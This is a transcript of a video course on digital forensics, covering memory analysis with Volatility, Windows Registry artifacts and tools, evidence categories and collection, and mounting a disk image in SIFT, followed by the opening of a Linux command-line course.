this tool is that it's designed to be loaded up onto a bootable live CD or USB. And you can plug it into a target
system to help you take the memory capture.
So it's nice to be able to take these memory captures externally without having to interact directly with the
target machines. Belkasoft RAM Capturer is another forensic tool that we can use to capture volatile memory
and save it to a file. And it is again a suite of tools that has a wide range of functionality. And finally, the last
tool that I'm going to mention is Process Hacker. And this tool is designed specifically to monitor running
applications on a machine. It's open source and it can be really nice to help augment a memory capture to give
you an idea of what is running on the machine at a certain time.
Objectives
demonstrate how to use the volatility framework to process extraction of computer memory
[Video description begins] Topic title: Using the Volatility Framework. Your host for this session is Peter
Adamson. [Video description ends]
[Video description begins] The terminal window displays. It displays the following folder path:
/Desktop/volatility_2.6_lin64_standalone. [Video description ends]
In this video, we are going to demonstrate diving into and analysing captured memory from a machine using
Volatility. Volatility is a free memory analysis framework, it's extremely powerful. It can be run on Mac,
Windows, Linux. In this example, we're going to be running it on a Linux system, in this case, my Kali Linux.
I've downloaded the standalone executable that can run. There are other ways you can use Volatility, you can
install it directly onto a system so you can actually use Volatility as a keyword. But in this case, we're just
going to be using our standalone installer and running that when we do our commands.
So when we perform digital forensics, one of the key indicators for us, or the key pieces of evidence, will be
capturing the running memory of a potentially infected machine. So we'll go in there and take the RAM as it is
in its current state and freeze it, save it into a file so that we can try and analyze it later. Oftentimes when we
do that, it's very helpful to note what kind of operating system the memory is running from. So are we taking
this from Windows 10 device, an Ubuntu, are we taking it for a Mac? That kind of thing, and that can help our
digital forensics a lot because then we know exactly where we are. But in this case, we're going to pretend like
we just have a sample piece of memory and we have to try to find out as much as we can about it without any
information.
So if I were to go to my terminal here and do a list, we can see here I have my Volatility standalone,
[Video description begins] He enters the command: ls. The output displays the list of files and directories
inside a folder. [Video description ends]
which is what I'm going to be using today to analyze our memory. And right here, we have our example virtual
memory file. So this is the file. This is the memory capture that's been taken off the machine we are going to
try to look at today. So to use Volatility, the first thing that we're going to do is use the Volatility standalone
and use -h. This command will give us a list of all the available commands to us, the Volatility lists, and will
give us a general idea of how to use this as the program.
[Video description begins] The command reads: ./volatility_2.6_lin64_standalone -h. [Video description ends]
So you can see it's giving us an output of all the different commands that we have available to us. Here are the
different options that we can do. And here are the plugin commands.
Now we're not going to go through every command today but we're going to go through some of the big
important ones. And the first one that we're going to look at is this one right here, imageinfo. And you can see
besides it says identify information for the image. Where we're going into a virtual memory without any kind
of information about it, this is a really good starting point. Because hopefully, it can tell us potentially where
what operating system this came from, where to start looking next. So in order to do that, we are going to say
that we're going to do the standalone. We're going to point, use -f to point to our memory file. And then at the
end, we're going to say imageinfo.
And we're going to let that run and hopefully it will come back with some suggested profiles for us to look at.
Okay, so we can see what this has given us.
It's given us quite a bit of information but the important stuff that we're interested here are these suggested
profiles. And we can see it's given us two suggested profiles, Windows XP Service Pack 2, and Windows XP
Service Pack 3. So now we have a bit of an idea as to where this memory came from. There's a good chance it
came from a Windows XP's system. We don't know exactly which Service Pack but we've narrowed this down
really well. So now we want to try and find out a little bit more information. Now that we have the profile,
what we can do is if we go back up here to our help command, we can see this is where we ran the the -h. You
can see we did -f with the FILENAME, filename to use when opening an image. Now we can use this --profile
command. And this is what we can use to load the profile. And now that we know which profile we want, we
can do that.
We're going to load it with this Windows XP Service Pack 2 profile at first. If that doesn't work, then we can
try again with the Windows XP Service Pack 3 profile. And the first thing that we're going to do is use this
pslist command. And that's going to print all running processes by following the EPROCESS lists. Basically,
it's going to give us a list of all the processes that we're running at the time that the memory was taken. So our
command is going to look like this. Our Volatility program -f example point to our memory. And then we're
going to say --profile=, we're going to use one of the suggested profiles here. So what I'll do is I'll just copy
this and paste it here.
And then we're going to say pslist. And this has given us a list of all of the processes that were running at the
time of the memory capture. So we can see we've got the offset in the memory location.
The name of the file or the process System, smss.exe, csrss.exe, the process ID, the PPID, threads, Hnds,
Session, Wow64, and the Start time and Exit time of the process. So in the primary information that you're
going to get out of this is the name of the executable, process ID can sometimes be useful and the start and exit
times of the files. We can see here they've started at 2012-07-22 at 02:42:32. Now, we've got a lot more
information than we started with. We know we're in a Windows XP system and we have a list of the files that
we're looking for. Now, usually, the reason we're performing these digital forensics is because we've suspected
a malware infection. So there's a good chance that we are going to be looking at these individual processes
trying to examine them and find out are any of these malicious or are they all pretty much okay, there's nothing
suspicious going on. So in order to do that, what we want to look at next is what kind of network
communications are going on, what kind of connections are available in the system.
So in order to get a list of network connections, what we can do is we have the same command, volatility- file
pointing to our memory file. The profile is Windows XP Service Pack 2, and we're going to say connections
and see who this machine might have been talking to. So right here, we can see we have communication going
on from our local address of 172.16.112.128 going to a remote address 41.168.5.140 on port 8080. Now, that's
not a standard port, it's not going to be HTTP or HTTPS. So that's going to flag to me as suspicious
communication. So what I could do here is I could take this IP address, throw it into Google or what other any
kind of information gatherer that you have available to you and find out is this a known command and control
server or malicious IP address. And then if it is, well, there's a indicator of compromise. And then the other
thing to note here is the process ID 1484.
So I'm going to go ahead and say there's a good chance that if that IP address is malicious, then the process ID
1484 is going to represent the malware executable that I'm interested in. And even if that IP address, I can't
find it to be malicious for sure, I'm still going to be flagging the process associated with process ID 1484 as
being suspicious. Another thing that might be interesting to us to look at is the command sockets.
So this will show us all of this active socket connections that are going on at the time that the memory capture
happened. And we can see here the associated process ID that is associated with that socket. So now we might
be narrowing in on the malicious executable associated with that communication. I do see that there are
process IDs associated here with some network sockets.
So I might flag these particular processes as more likely to be malicious than anything else. So I would
highlight these process IDs, go back to my process list, and maybe highlight those as potential malware with a
little bit more conviction than I had before. And we have also been able to gain a little bit more information
about our process ID 1484. We now have some information about the socket that it is making use of. So in
addition to finding some other potentially suspicious activity, we have narrowed down and gained a little bit
more information about some activity that we thought was suspicious before. But now we want to potentially
try and go and look and detect more about our malicious executables. So let's use this command psxview.
And what this does is it's going to give us an idea if any of these executables are not listed where they should
be.
So in this case, let's look at this first one, winlogon.exe. It's true across the board, it's present in pslist, psscan,
thrdproc pspcid, csrss, session, deskthrd, ExitTime. So I don't see anything immediately suspicious there about
that. What we generally are looking for, we want to see something where there is one false. Oftentimes the
false shows up in pslist because it's the easier process to hide your malware from the being listed in. So if we
see a false in this column and trues all across the board elsewhere, we have a pretty good idea that, that is
malware, or at, least something suspicious is going on and we should look further into that. Down here we see
some falses, three falses on the side here. Potentially that's suspicious, but it's not as convincing to me as a
single false here in this column. I might still flag it and we could look at those. One thing I do see is that there
is one false on the process csrss.exe in the csrss column, and the rest are true.
That does seem kind of suspicious with the single false and the rest being true. So I'm going to be adding
csrss.exe with process ID 584 to my list of highly suspected executables. And here we can also see that our
process ID 1484, which we are suspicious of, is explorer.exe. Now, that doesn't necessarily mean it actually is
Explorer, you can easily make your malware have the name explorer.exe. Unfortunately, it's true across the
board. So we haven't added any suspicion here, but we also haven't necessarily taken away any suspicion from
that executable either. This is where you start to build up. You're building up correlations all across the board
from this process list, through the socket connections, through to this psxview and trying to correlate malware
and find it in the memory. So to finish up, let's go back and look at the list of commands.
[Video description begins] He enters the command that reads: ./volatility_2.6_lin64_standalone -h. [Video
description ends]
You can see there are a ton of commands that we haven't used today that could still be extremely useful to you
in various cases. Things like if truecrypt is used, you could try to get information there. Other potentially
useful commands, this hashdump is nice. You could try to find out if there's any password hashes that it could
extract from our memory file. Here's the connections command that we used earlier. And so you can go
through this list and find out commands that are useful to you and then go from there. So Volatility is very,
very useful to us when we're performing digital memory forensics.
Objectives
describe the Windows Registry and recognize the valuable information stored within
[Video description begins] Topic title: Windows Registry. Your host for this session is Peter Adamson. [Video
description ends]
In this video, we're going to provide an overview of the Windows Registry and recognize the valuable
information that's stored within it. So what is the Windows Registry? Well, at its essence, it's basically just a
file system. And it consists to the collection of what we call hive files, and these hive files are sets of key value
pairs. So you have a certain key, it's got a value associated with it, you can modify that value and it will have
an effect on whatever the keys associated with. And then there are hierarchies of these keys and sub-keys that
you go through and go into and modify in the registry.
And a lot of the actions that you take on a day to day basis in a computer will be logged in the registry files. So
to understand the file system and the hierarchy that's contained within the Windows Registry, we have to have
an understanding of how it's laid out. So you can think of it as analogous to your C drive. You go into your C
drive and then under your C drive, you have the options of Program Files and Users, and you can keep
navigating to your sub-directories from there. And it's very similar within the registry. And just like in a file
system, we're going to go digging through the registry looking for points of interest. And some of the most
common folders or sub-folders that we're going to look at in the registry are the System folder, Software
folder, Security, and SAM. So you'll find these each under one of the top-level hives. And these are going to be
the keys that we're going to look at, along with their associated sub-keys.
Now there's a lot more contained within the registry and oftentimes you will go beyond just these four keys.
But these are four very common, very useful keys in the registry. In order to analyze the Windows registry, we
need to have a way of getting access to a copy of that registry. This is where we get to the acquisition of
registry files. And we need to do that so that we can preserve the registry for future analysis and do an analysis
of it without having to be on the target machine itself. And this isn't necessarily a trivial task because the
registry is constantly changing since the information stored in the registry relates to the configuration of a
system. And systems are highly dynamic. The Windows registry is always changing as well. But luckily there
are a wide range of tools available to us as investigators to go out and acquire these registry files. And some
examples are FTK Imager and Encase, and these are both softwares designed to help us acquire and analyze
registry files.
So now that we have a pretty good idea of what the registry is and how it's laid out, let's look at how that
hierarchy works from top to bottom. So we have our hives and those are root folders, and we call them the
hives. And they're at the very top. And then once we expand those and start digging in, we have sub-folders
which we call keys. And they have their own associated values as well as sub-folders within them that we call
subkeys. And those subkeys then have associated values. And then we go on like that, digging from top to
bottom. So we have hives, keys, then subkeys. So our final piece of the puzzle in the registry hierarchy is, what
are hives? Well, there are five hives. We have HKEY_CLASSES_ROOK or HKCR. HKEY_USERS or HKU.
Objectives
navigate the Windows Registry and use it to locate changes made a to system
[Video description begins] Topic title: Locating Evidence Within the Registry. Your host for this session is
Peter Adamson. [Video description ends]
In this video, we're going to demonstrate using the Windows Registry to perform digital forensics and
investigation. The Windows Registry is, you can think of it as a configuration file. It's designed to store
information about the hardware and software on a system, user activities, programs that are operating.
Basically, anything about the system can be found in the registry. If you know where to look, you can find info
about user activity, system devices, installed software, and more. So the registry can be great for answering the
questions of what happened during an incident? When did the incident happen?
Where on the system did the incident happen? And how did the incident happen, when it comes to malicious
attacks? So to start the registry in Windows, we can go and
[Video description begins] The Windows Desktop screen displays. [Video description ends]
[Video description begins] He enters the regedit in the search bar which opens, after selecting the Start
menu. [Video description ends]
And that's where we want to go to start in our investigation into the registry.
[Video description begins] A window titled: Registry Editor displays. The left pane contains a list of folders.
The right pane displays currently selected folder details. [Video description ends]
So I'll take us back up here to the root. So when you first open the registry, you're met with five root directories
called hives. We have HKEY_CLASSES_ROOT, HKEY_CURRENT_USER, HKEY_LOCAL_MACHINE,
HKEY_USERS, and HKEY_CURRENT_CONFIG. Each one of these stores different types of values and
different information about the system, and you can find valuable information in all of them. So effectively,
these are storing keys and their associated values. So you can see here on my root key, I have the default and
the value's not set.
And then when I expand it, I have all of these different subkeys, all of which contain their own information. So
if I choose one at random here, .386, this has this information here. And I can expand it and go to another
subkey of this subkey, PersistentHandler, and get this value here. Now, if I double-click on to a value, I can
change the data associated with a value.
[Video description begins] A dialog box titled: Edit String displays. It contains two fields, namely: Value name
and Value data. The OK and Cancel buttons display at the bottom. [Video description ends]
In digital forensics, I'm not going to be doing that because I don't want to be modifying anything here, I'm just
going in and performing an investigation. So we're not going to be able to show all of the different values that
you might be looking for when you're going into forensics.
But I will show you some of the more common ones where you could start to look. And then hopefully what
that will do is lead you on to deeper and deeper learning about how you can use the registry even further. So
the first thing that I often look for is signs of persistence. And what I mean by persistence is malware that has
embedded itself into a system so that it is auto starting when a machine starts up. Rootkits do this or persistent
backdoors. So I want to try and see if I can find one of those running on a machine. So in order to do that, I'm
going to navigate to HKEY_LOCAL_MACHINE,
[Video description begins] A list of folders appear underneath, including: HARDWARE, SAM, SECURITY,
SOFTWARE and SYSTEM. [Video description ends]
[Video description begins] The list of folders inside the selected folder appears underneath. This occur for
each folder the host selects. [Video description ends]
And then I'll scroll down to Windows, And then I'll go to CurrentVersion. And then I'm going to go down to
Run. And what we see here are lists of files and executables that are set to start up automatically when a
computer boots up.
So if we see here anything that looks suspicious, then we would start to go into that and ask why is this
executable starting up on startup? Does it need to be or is this a potential rootkit? So this is a good place to
look. We can also go to the RunOnce. This is another area where rootkits could end up being.
[Video description begins] The RunOnce folder is present beneath the Run folder. [Video description ends]
Another place where we could go, we could go to, and I'll scroll back up here and condense some of these.
We're going to go to HKEY_LOCAL_MACHINE, and then we're going to go to SYSTEM. We're going to go
to CurrentControlSet, and then we're going to go to Services. So Services is a great way to get information
about any service that might be running on a machine in general. This will have a full list of any installed
service on a computer. Now, another thing we often want to know about is, how did a piece of malware or an
incident start to occur?
Where did it originate from? And oftentimes a pretty common attack vector is through some piece of portable
media, like a USB stick or an external hard drive that got plugged in and a file was transferred. So we
oftentimes want to know, did a piece of external portable media get plugged into this machine? And the
registry can tell us that as well. So if we go to HKEY_LOCAL_MACHINE, and then we go to SYSTEM, and
we go to ControlSet001. We go to Enum, and then we go to USBTOR. This shows us a list of all the devices
that have been plugged into this machine.
So we can see we've had a USB stick plugged in here, and we can get all of the different information
associated with that USB stick here. So if a certain USB stick was confiscated from a criminal or from a
suspect during an investigation, you could use this information to prove that the USB stick had been plugged
into the machine.
Similarly, for external devices, we could go to, HKEY_LOCAL_MACHINE, go back to SYSTEM, and we'll
go to MountedDevices. And this gives us information about all of the devices that would be mounted on a
machine. So if somebody put in an external hard drive, then you would see that here. We might also like to see
the browsing URLs of a user, so find out what URLs, what places on the Internet they've recently been to.
Because then we might be able to see if they visited any malicious websites, or if something else has been
visiting malicious websites on their behalf or malicious URLs. So to do that, we can go to
HKEY_CURRENT_USER, and then we can go down to Software.
And then if we go to Microsoft and we go to Internet Explorer, And then we click on TypedURLs. And here
we can see any information about URLs that were visited by a user. If the attack was relatively recent, we
might also be interested in seeing the recent documents that might have been opened or used. So again, we can
go to HKEY_CURRENT_USER, we go down to Software, and then we go to Microsoft. And then we go to
Windows. And we go to CurrentVersion. And then we go to Explorer. And we click on RecentDocs. And we
can see here, information about all of the recent documents that have been opened on this machine. So if you
were interested in Microsoft Word documents, we could go here to .docx.
This is going to be all of our Microsoft Word documents. I could double-click here, and we can see the most
recent
[Video description begins] A dialog box titled: Edit Binary Value displays. It contains two fields, namely:
Value name and Value data. The Value data field contains a list of results. The OK and Cancel buttons display
at the bottom. [Video description ends]
information about the most recent file that's been used. You can see it in the binary format, hex, and ASCII
over here on the right. And other things you might be looking for are things like .tar files. Generally on
Windows, .tar should not really exist or be run. So any kind of .tar file is going to be somewhat suspicious to
see on your machine. So those are good indicators there. If we wanted to see what kind of networks a machine
has been connected to, we could go to HKEY_LOCAL_MACHINE. Go to Software. Go to Microsoft. Go to
Windows NT. Go to CurrentVersion, which we're already expanded into.
Go to NetworkList. And then go to Profiles. And then we'll see here we've got a list of all of the different
profiles that, these are different networks that this machine is connected to. So if you needed to prove that a
certain machine was on a certain network at a certain time, this is where you could go to do that. So this is just
a small taste of what you can get out of the Windows Registry. It's a very valuable tool when it comes to
digital forensics and something that any investigator needs to have in their toolkit.
Objectives
differentiate between Windows Registry tools and the techniques used for analyzing changes to the
registry
[Video description begins] Topic title: Registry Analysis Tools. Your host for this session is Peter
Adamson. [Video description ends]
Once we're at the point where we are going through the Windows Registry system and ready to do forensic
analysis on a Windows Registry, we need to be able to have a good idea of what tools and techniques we can
turn to in order to facilitate the analyzing of that registry. The first tool that I'm going to talk about is Registry
Viewer. A Registry Viewer is a tool provided by the organization access data. And the nice thing about
Registry Viewer is it's going to let you view the contents of any registry. So the default Windows Registry
Viewer is limited in that it can only look at the current computer's registry.
Whereas with Registry Viewer, you can load up any registry file and analyze it that way. And also you can get
into the protected storage that has things like your passwords, usernames, other critical information that you
might not be able to get from the regular Windows Registry Viewer. So it provides a lot more power at your
fingertips than a standard baked-in Registry Viewer to the Windows operating system. Another nice tool for a
forensic analysis of a registry is Reg Ripper. So this is an open-source tool written in Perl. And it's designed to
extract key values and other information out of a registry for you. So basically, you would point it at a hive,
say the system hive, and then try and extract relevant key data out of that hive.
So you can get the keys, values, and the data associated with it. And the final tool that we'll talk about which
can be really nice for analyzing registry is registry browser. So again, this is aimed specifically at Windows
registries. And this is a nice tool because it looks at the registry files stored on the disk, re-compiles them into
its own complete Windows Registry. And then it allows you to search through the entire registry as opposed to
going through on a hive by hive basis. So it provides some almost database-like searchable tool for searching
your registry which can be extremely convenient.
Objectives
differentiate between categories of digital evidence, including computer, mobile, network, and
database
[Video description begins] Topic title: Categories of Digital Evidence. Your host for this session is Peter
Adamson. [Video description ends]
Digital forensics is the process of capturing or preserving forensic data of a piece of evidence such as a
suspected compromised computer or a computer that's been used to perform malicious activities, and then the
subsequent analysis of that captured data. So when it comes to this field, there a lot of different categories of
evidence that we can collect. And we need to go over how to differentiate between these different categories of
digital evidence. So we're going to talk about, in this video, what the different categories are. The first category
of digital evidence or forensics is computer forensics. Computer forensics is one of the more widely known
categories.
It's something that a lot of people are familiar with. It's the first thing that comes to mind when a lot of people
think about digital forensics. And it deals with the analysis of memory, hard drives, system logs, anything that
you could pull from, say, a confiscated laptop or desktop computer. So you're going through and looking for
maybe trace evidence of deleted files or the presence of malware or something that would indicate towards
what you are trying to prove. The next category of digital forensics is mobile forensics. So this is dealing with
cell phones, tablets, devices that have a built-in communication capability and can be portable and taken and
generally move around quite a bit.
And the tools that you use for mobile forensics, there's a lot of overlap between mobile and computer forensics
and the tools that you use. But there's a difference in how you use them. And there's a lot more nuances to
mobile forensics. For example, a desktop computer, it's less likely that, that desktop computer has been around
and logging into many different wireless access points. But for a cell phone, it's a lot more likely that that cell
phone will have gone and hit many, many different WiFi access points. So it's a little bit different in how you
approach the device. The next category that I want to talk about is network forensics. Network forensics is
generally built around the analysis of network traffic, like using packet captures or PCAP data to detect
intrusions or malware communicating on the wire between machines.
So this is where you're going in setting up your mirror ports on switches or your packet capturing devices and
outputting them to some sort of packet analysis tool like Wireshark. Next up, we have database forensics. So
this is the analysis of data and metadata within databases, things like Microsoft SQL, Oracle, other databases,
PostgreSQL. It doesn't really matter what the type of database is, the forensics around it are going to be
similar, the techniques that you use. So this is looking at when we talk about the data, this is the records that
are actually contained within the database. Look, go in and find out have any records been modified, added,
removed and find out if somebody's been meddling in the database. And then the metadata is looking at things
like the time when a transaction occurred, looking to try and isolate when an attack or breach might have
happened, and any kind of data associated with the data in your database. At the end of the day, regardless of
what type of digital forensics you're doing whether you're doing computer forensics, network forensics, you're
still going to be producing digital evidence.
So once we have our evidence, we need to have a way of classifying that evidence. So the classifications are
based on a couple things. One is the source. This has metadata associated with where did the data come from.
So things like the computer it was lifted from or the network that it was contained in. You also have metadata
associated with certain files, like a picture taken on a camera on a phone will oftentimes have geo data
associated with it. So this is where you can start to classify physical location data.
This is the kind of example of source data that we would classify for digital evidence. And then we have to
classify it based on the format. So it's very important that digital evidence be maintained in it's original format.
Whatever it was obtained in, it should also be stored in that format, just to maintain the authenticity and to
have as little corruption as possible within the handling of the evidence. And the type of data, are we dealing
with a spreadsheet or are we dealing with a database or a Word document? Are we dealing with an executable?
That's an example of how we classify evidence based on type.
Objectives
outline how to gather digital evidence, including identification, collection, acquisition, and
preservation
[Video description begins] Topic title: Gathering Digital Evidence. Your host for this session is Peter
Adamson. [Video description ends]
How do we go about gathering our digital evidence? Well, the first step when trying to gather digital evidence
is identification. Identification is really the process of searching. So where our digital forensics analyst is going
into a cyber incident and searching for the affected machines or the perpetrating machines. And then trying to
detect any malicious activity that's been on those machines and finally, documenting their findings. So this is
the first step. You can think of identification kind of similar or analogous to the act of triaging.
Once our identification stage is complete and we're satisfied that we have sufficiently identified all relevant
points to our forensics case, then we move on to the actual collection of what we've identified. So this is where
anything that's been identified in the identification stage needs to be collected in some way and either
transferred to a laboratory for analysis. In certain cases that can't be done, you have to do your analysis on site.
So you have to transfer them to your analysis machine. But either way, this is where you start to go in and
actually grab what's relevant to you. So this is where you're going to be grabbing registry samples or memory
captures or packet captures. There are a variety of different ways that we'll collect or acquire our digital
evidence. One common way is disk-to-disk, so copying a physical hard drive to another physical hard drive
and taking that away for logical analysis.
Disk-to-image, so taking a sort of imaging software, creating an ISO image or some other kind of workable
image to copy a disk into that file format. Logical disk-to-disk, if we're dealing with any virtual memory
segments or logical volumes, then we'll try and copy those to our physical disk. And finally, data copy of a file
or folder, we'll use this where storage of the entire disk is infeasible either due to the large size of that disk or
some other reason. So in that case, we will just isolate small amounts of data, such as a file or folder and
capture that. And then finally, once we have all of our digital evidence collected, we need to go about the
process of preservation. Making sure that all of the digital evidence that we've collected is securely stored both
physically and digitally.
So we want to make sure it's in a physically secure location and that we have sufficient backups for disaster
recovery and redundancy. And we also want to make sure the data is stored in such a way that it can't be
altered, or that there would be some sort of telltale sign if it was altered. So we need sort of non repudiation
techniques there. And then once that's done, we have gone about the process of collecting our digital evidence.
Objectives
identify tools available for computer forensic analysis and their features
[Video description begins] Topic title: Computer Forensic Analysis Tools. Your host for this session is Peter
Adamson. [Video description ends]
Now let's look at and differentiate between the various tools that are available to us for computer forensics
analysis. The first one we're going to look at here is the SANS Investigative Forensic Toolkit or SIFT. We're
going to touch more on detail about SIFT later. So we're just going to go briefly over here. But SIFT is a really
nice toolkit for instant response and forensic research. And the toolkit itself is a collection of various different
tools all put together into one convenient package for you to use as an analyst. For these purposes of instant
response and research.
And the idea of SIFT is that it can help you provide incident response and forensics across a wide variety of
different systems. Our next tool is the Sleuth kit or TSK. And once again, we're dealing with a collection of
forensics tools all put together into this kit called the Sleuth kit. It's open source, and it's got a combination of
Unix and Windows-based forensics tools. And it's really designed and aimed at analyzing disk images and
recovering files. So these disk images will be images that you've recovered from a victim machine or an
attacking machine. And you're trying to analyze them and get files back off of them that might have been
deleted or are otherwise inaccessible. And the nice thing with the Sleuth kit is it has support for a huge variety
of file systems.
So there's a good chance that if you've pulled a disk image out of a machine, the sleuth kit is going to be able
to support it. Next up, we have X-Ways. And X-Ways is a complete forensic suite designed specifically for
Windows systems. So anything Windows XP, 7, etc., that's where you're going to choose X-Ways. And the
nice thing that this tool has going for is its portability. It's designed so that you could put it onto a bootable
USB stick, move it around, plug it into a machine. And then you can use this tool to take disk images and
clones and then analyze those images all from the same tool. So it's very convenient in that way. And the final
tool that we're going to talk about is called Caine, spelled C-A-I-N-E. And Caine is a full Linux distribution.
So you can install this as a standalone system. Or, more commonly, you could put it onto a bootable USB or
CD and then move it around in that way. And Caine comes with both command line and GUI-based options.
So you can sort of use it however you're familiar with if you prefer command line or GUI. And it also comes
packaged with other common forensics apps like Wireshark. And Caine is really, really nice because it can
really do everything. It's extremely powerful. It runs across multiple different systems for your forensics,
Windows, Linux, and it's a really nice sort of all-around tool to have in your back pocket.
Objectives
[Video description begins] Topic title: SANS Investigative Forensic Toolkit (SIFT). Your host for this session
is Peter Adamson. [Video description ends]
Now, let's look at an overview of the SANS Investigative Forensic Toolkit or SIFT. So SIFT is an open source
tool. It's freely available from SANS. You can download it and either build it and compile it yourself, or use
their prebuilt operating system and deploy it as a virtual machine. It helps you with incident response through
bundling together many of the free and open source available forensics tools on the market into one convenient
location. And the nice thing with SIFT is that even though it's free, it competes with the proprietary systems
that are out there in the market for forensics now. And in many cases, it actually outperforms them.
So what are the keys features of SIFT? Well, it's a 64-bit base system. And it's designed in such a way as to
optimize memory usage so that when performing comparable forensics tasks, you can get away with a much
lighter weight or less powerful system using SIFT than you would have to have with another forensics tool. It's
always got the current forensics tools and techniques, it's continually updated. It also comes with its own auto
update tools so you don't really need to keep up and keep looking at well, which tool is now out of date. You
just have to run your automatic updater, and it'll pull in the updates and current forensics tools for you. It's
ready to deploy as a virtual machine, which it's always nice to be doing your forensics on a virtual machine.
The actual operating system that it runs on is an Ubuntu 16.04 Base. And when it comes to compatibility, it's
compatible with both Linux and Windows, as well as having a wide range of file system support when it
comes to image carving and file analysis. And it comes with a nice SIFT command-line interface installer for
sort of intuitive installation.
Objectives
[Video description begins] Topic title: Analyzing Evidence Using SIFT. Your host for this session is Peter
Adamson. [Video description ends]
In this video, we are going to show how to mount forensic evidence using SIFT.
[Video description begins] The Desktop screen displays. It contains various files and folders. [Video
description ends]
So here in front of you, I'm working on the pre-packaged SIFT virtual machine. You can download this from
the SANS website. You can also build the machine from scratch if you prefer doing it that way, but I have used
the OVA download to run the actual SIFT workstation. So SIFT is a collection of free and open-sourced
forensics tools used to do incident responses and investigation. And we are going to show how to mount
evidence files.
Mounting evidence files is the first step in order to carry out the wide variety of forensic analysis techniques
used by forensic investigators in order to investigate cyber attacks. We're not going to go into all the different
analysis techniques that would go on after the evidence has been mounted. But this will show you the first step
which is getting that evidence mounted. So I have downloaded here two sample evidence files.
[Video description begins] The Explorer window titled: Downloads displays. It contains two files, namely:
nps-2008-jean.E02 and nps-2008-jean.E01. [Video description ends]
So you can see it's got a .E01 format here on the end this nps test 2008-jean.E01. E01 stands for encase image
file format, and it's a file image format that contains digital evidence such as disk images and storage of local
files. Basically, this is something that has been ripped off of a machine that we suspect has had an incident.
And we've collected it in case in this file format, and this is what we'll use to investigate.
So what I'll do is I'll move these to the desktop. And I'm going to make a new folder here called evidence.
[Video description begins] He right clicks on the Desktop. A dialog box titled: New Folder displays. It
contains a text box labelled as: Folder name. The Create button displays at the top right corner. [Video
description ends]
And then we'll put the files in there. That's where we'll work out of.
[Video description begins] The Explorer window titled: evidence displays. It contains two files, namely: nps-
2008-jean.E02 and nps-2008-jean.E01. [Video description ends]
[Video description begins] The terminal window displays. It displays the following folder path:
/Desktop/evidence. [Video description ends]
Now, we want to mount our evidence file. So in order to do that, we are going to elevate ourselves to super
user privileges with the command sudo su.
[Video description begins] The command reads: sudo su. [Video description ends]
And what we're going to do is use the command built into SIFT called ewfmount. And then we are going to
point it to our .E01 file, nps-2008- jean.E01.
[Video description begins] The command reads: ewfmount nps-2008-jean.E01 /mnt/ewf/. [Video description
ends]
And we are going to put that into /mnt/ewf. Okay, and now if I were to do an ls / on that directory, we can see
we have ewf1.
[Video description begins] The command reads: ls mnt/ewf/. [Video description ends]
This is now set up and formatted as the type of file system that we can actually mount, which is what
ewfmount has done for us. Now before we go ahead and mount that file system, we want to get the offset value
for our mount. To find the offset value, we're going to use this command, fdisk -l /, and then we're going to
point to our ewf1. So we'll go /mnt/ewf/ewf1.
[Video description begins] The command reads: fdisk -l /mnt/ewf/ewf1. [Video description ends]
And what we're looking for here is this start value right here, so it's 63. Now these are in blocks of 512. So our
offset value is going to be 63 times 512. So what we're going to do is we're now going to go ahead and mount
that file. So our mount command is going to be, mount -o read-only, loop, show_sys_files,
streams_interface=windows. And then we're going to direct it to /mnt/ewf/ewf1. For that, we're also going to
put in that offset that we found.
[Video description begins] The command reads: mount -o ro, loop, show_sys_files,
streams_interface=windows, offset=$((63*512)) /mnt/ewf/ewf1 /mnt/windows_mount. [Video description ends]
So our offset is going to equal, we're going to make this a formula. So we're going to say 63 times 512. And
then we're going to put our destination mount point which is going to be /mnt/windows_mount. Okay, and now
we have mounted our evidence file. So if I navigate to /mnt/windows_mount
[Video description begins] The command reads: cd /mnt/windows_mount. [Video description ends]
and I do an ls, here is the information associated with our forensic system.
[Video description begins] The command reads: ls. [Video description ends]
At this point, we have successfully mounted the evidence file. And we can go about the further analysis
techniques that we would want to go and do for our forensics.
Objectives
[Video description begins] Topic title: Course Summary [Video description ends]
So in this course, we've examined computer forensics analysis tools, techniques and best practices to use when
performing cybercrime investigations. We did this by exploring packet capturing and network forensics and
vulnerabilities. How to gain intelligence from an attack using packet capturing, and how to reconstruct artifacts
and files from a PCAP file using Wireshark. How to work with volatile data and compare tools for conducting
analysis of a computer's memory. How to use the volatility framework to process an extraction of computer
memory.
The Windows Registry and the information it contains and how to navigate the Windows Registry to locate
evidence. Windows Registry tools and techniques for analyzing registry changes. The categories of digital
evidence, techniques to gather digital evidence and various tools for performing computer forensics analysis.
And the SANS Investigative Forensics Toolkit, or SIFT, and how to mount evidence using SIFT. So in our
next course, we'll move on to explore Cyber Ops Windows device hardening.
Security Programming: Command Line Essentials
This 14-video course explores how to navigate a Linux command-line environment by showing learners how
to use its most common tools, including text editing and processing, file monitoring and comparison, and
package management. You will examine the common properties of the command line environment, including
the bash shell, its properties, and the features of the PowerShell environment. This course next demonstrates
how to perform text editing using commands such as nano; how to use the Linux EI library, Linux ED text
editor; and text processing using commands such as sed awk, and cut. You will learn how to perform repeat
actions, and the bash shell history, and perform process control tasks such as PS and kill. Then learn how to
use the command line to schedule jobs, perform file and command monitoring, and perform file comparison
using the diff command. Finally, this course demonstrates how to redirect the inputs and outputs of commands
and files, and perform package management tasks by using the apt command.
Table of Contents
Objectives
discover the key concepts covered in this course
[Video description begins] Topic title: Course Overview. The host for this session is Steve Scott. He is an IT
Consultant. [Video description ends]
Hi, I'm Steve Scott. I've been a software developer and IT consultant for almost a quarter of a century. I've
traveled around the globe to serve clients, responsible for building software architectures, hiring development
teams, and solving complex problems through code. With my toolbox of languages platforms, frameworks,
and APIs, I round up my coding experience with the formal background in mathematics and computer science
from Mount Allison University.
In this course, we're going to explore the navigation of a Linux command line environment and employ its
most common tools, including text editing and processing, file monitoring and comparison, and package
management. I'll start by examining the common properties of the command line environment, including the
bash shell and its properties and the features of the PowerShell environment. I'll then demonstrate how to
perform text editing using commands such as nano, EI and ED, and text processing using commands such as
sed awk, and cut. Next, I'll show how to perform repeat actions and use the bash shell history, as well as
perform process control tasks such as PS and kill. I'll then use the command line to schedule jobs, perform file
and command monitoring, and perform file comparison using the diff command. Lastly, I'll demonstrate how
to redirect the inputs and outputs of commands and files and perform package management tasks using the apt
command.
After completing this video, you will be able to describe the common features and properties of command-line
environments.
Objectives
[Video description begins] Topic title: Command Line Properties. The presenter is Steve Scott. [Video
description ends]
In this video, I'll describe some common features and properties of command-line environments.
The CLI is keyboard based. So commands are typed and the results are output, is displayed in formatted text.
